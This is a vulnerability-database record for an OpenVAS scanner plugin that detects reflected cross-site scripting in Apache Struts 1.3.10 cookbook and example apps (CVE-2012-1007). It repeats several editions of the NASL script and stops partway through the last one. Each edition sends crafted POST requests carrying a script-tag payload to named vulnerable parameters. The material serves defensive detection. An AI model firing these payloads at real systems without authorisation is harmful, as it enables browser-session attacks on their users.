{"id": "OPENVAS:1361412562310802423", "bulletinFamily": "scanner", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "published": "2012-02-08T00:00:00", "modified": "2019-02-14T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://struts.apache.org/download.cgi", "http://secpod.org/blog/?p=450"], "cvelist": ["CVE-2012-1007"], "type": "openvas", "lastseen": "2019-02-14T14:56:01", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "a97073a1ea296bf5e42f2a325f69041069875547077b6b55b987b6e1bb091c59", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "0d704865090534e07b7c35f50e1b1600", "key": "modified"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "f47e37cc155650af3b54b31ab9b0ce5e", "key": "sourceData"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-09-02T00:02:06", "modified": "2018-08-20T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11057 2018-08-20 13:59:30Z asteins $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11057 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-20 15:59:30 +0200 (Mon, 20 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n ## Send and Receive the response\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-02T00:02:06"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 11, "enchantments": {"dependencies": {"modified": "2018-10-22T16:44:01", "references": [{"idList": ["STRUTS_EXAMPLES_XSS.NASL", "STRUTS_COOKBOOK_XSS.NASL"], "type": "nessus"}, {"idList": ["OPENVAS:802423"], "type": "openvas"}, {"idList": ["EDB-ID:18452"], "type": "exploitdb"}, {"idList": ["CVE-2012-1007"], "type": "cve"}, {"idList": ["ORACLE:CPUOCT2016-2881722", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUOCT2018-4428296"], "type": "oracle"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "65f2cd0ebb2f62630fc14c0f296a7b8f408855d9db9549063fa97901cbeb5321", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "8be90a922e3fddc17514b9fd17f39e9b", "key": "modified"}, {"hash": "37ae51d823e2e3ae1aa992980def89a4", "key": "sourceData"}, {"hash": "cda3f379f5c476617024346b22f9387b", "key": "references"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-10-22T16:44:01", "modified": "2018-10-12T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://struts.apache.org/download.cgi", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11888 2018-10-12 15:27:49Z cfischer $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11888 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 17:27:49 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"http://struts.apache.org/download.cgi\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nuseragent = get_http_user_agent();\nhost = http_host_name(port:asport);\n\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 4}, "differentElements": ["modified", "sourceData"], "edition": 11, "lastseen": "2018-10-22T16:44:01"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "586033bf039721d9e1ee6243cc5e1cc0225ab10ae2237f9ebe36e1f01751d4fe", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "5344ebb020715aaecee9e163050c9aea", "key": "sourceData"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}, {"hash": "8774526118c14b0e4377cfdcd9994c9b", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-09-12T13:40:28", "modified": "2018-09-11T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11322 2018-09-11 10:15:07Z asteins $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11322 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-11 12:15:07 +0200 (Tue, 11 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-08 17:33:28 +0530 (Wed, 08 Feb 2012)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP POST request\n and check whether it is able to read cookie or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws due to an,\n\n - Input passed via the 'message' parameter in 'processSimple.do' and\n 'processDyna.do' action is not properly verified before it is returned\n to the user.\n\n - Input passed via the 'name' and 'queryParam' parameter in\n '/struts-examples/upload/upload-submit.do' action is not properly verified\n before it is returned to the user.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an\n attacker to execute arbitrary HTML code in a user's browser session in the\n context of a vulnerable application.\n\n Impact Level: Application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts (cookbook, examples) version 1.3.10 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.3 or later,\n For updates refer to http://struts.apache.org/download.cgi\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://secpod.org/blog/?p=450\");\n script_xref(name:\"URL\", value:\"http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_struts2_detection.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_family(\"Web application abuses\");\n script_require_ports(\"Services/www\", 8080);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nasport = 0;\nasreq = NULL;\nasres = NULL;\nasRes = NULL;\n\nif(!asport = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!dir = get_app_location(cpe:CPE, port:asport)){\n exit(0);\n}\n\nhost = http_host_name(port:asport);\n\n## Make list index pages\nforeach indexpage (make_list(\"/\", \"/welcome.do\"))\n{\n asreq = http_get(item:string(dir, indexpage), port:asport);\n\n if(!isnull(asreq))\n {\n asres = http_keepalive_send_recv(port:asport, data:asreq);\n\n if(!isnull(asres) && \">Struts Cookbook<\" >< asres)\n {\n postdata = \"name=xyz&secret=xyz&color=red&message=%3Cscript%3Ealert\" +\n \"%28document.cookie%29%3C%2Fscript%3E&hidden=Sssh%21+It%\" +\n \"27s+a+secret.+Nobody+knows+I%27m+here.\";\n\n asReq = string(\"POST \", dir, \"/processSimple.do HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n ## Confirm the exploit\n if(asRes =~ \"HTTP/1\\.. 200\" && \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">Simple ActionForm Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n\n if(!isnull(asres) && \">Struts Examples<\" >< asres)\n {\n postdata = '-----------------------------7559840272055538773136052934' +\n '\\r\\nContent-Disposition: form-data; name=\"theText\"\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"theFile\"; fil' +\n 'ename=\"\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n' +\n '\\r\\n-----------------------------7559840272055538773136052' +\n '934\\r\\nContent-Disposition: form-data; name=\"filePath\"\\r\\n' +\n '\\r\\n<script>alert(document.cookie)</script>\\r\\n-----------' +\n '------------------7559840272055538773136052934--\\r\\n';\n\n asReq = string(\"POST \", dir, \"/upload/upload-submit.do?queryParam=Successful HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"User-Agent: \", OPENVAS_HTTP_USER_AGENT, \"\\r\\n\",\n \"Content-Type: multipart/form-data; boundary=---\" +\n \"------------------------7559840272055538773136052934\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(postdata), \"\\r\\n\",\n \"\\r\\n\", postdata);\n asRes = http_keepalive_send_recv(port:asport, data:asReq);\n\n if(asRes =~ \"HTTP/1\\.. 200\" &&\n \"<script>alert(document.cookie)</script>\" >< asRes &&\n \">File Upload Example<\" >< asRes)\n {\n security_message(asport);\n exit(0);\n }\n }\n }\n}\n", "title": "Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities", "type": "openvas", "viewCount": 3}, "differentElements": ["modified", "sourceData"], "edition": 6, "lastseen": "2018-09-12T13:40:28"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2012-1007"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This host is running Apache Struts and is\n prone to multiple Cross-site scripting vulnerabilities.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "c97938c0e6d1f87a205d9f31007f62268e6162452d0f58f5f204727978439a6c", "hashmap": [{"hash": "adb13615c304e59dcac77fe4f514b658", "key": "description"}, {"hash": "0d704865090534e07b7c35f50e1b1600", "key": "modified"}, {"hash": "efc663435ab5bd98517b05c5b7b21cb1", "key": "pluginID"}, {"hash": "6c5c375f27b9954bea64597d4bcf9b86", "key": "published"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "a282f166ddc6c378940071a6b738e1a3", "key": "reporter"}, {"hash": "f47e37cc155650af3b54b31ab9b0ce5e", "key": "sourceData"}, {"hash": "63f251d2d4cd1e13840040e6efe06b02", "key": "cvelist"}, {"hash": "f9894c456f964a2678924368315a1c93", "key": "references"}, {"hash": "6726cb59797400dc00f67e6206bce00a", "key": "href"}, {"hash": "8d096a067f3cb257684a509c3f5930d1", "key": "title"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802423", "id": "OPENVAS:1361412562310802423", "lastseen": "2018-08-30T19:26:56", "modified": "2018-08-20T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310802423", "published": "2012-02-08T00:00:00", "references": ["http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt", "http://secpod.org/blog/?p=450"], "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_struts_cookbook_n_exmp_mul_xss_vuln.nasl 11057 2018-08-20 13:59:30Z asteins $\n#\n# Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802423\");\n script_version(\"$Revision: 11057 $\");\n script_bugtraq_id(51900);\n script_cve_id(\"CVE-2012-1007\");\n 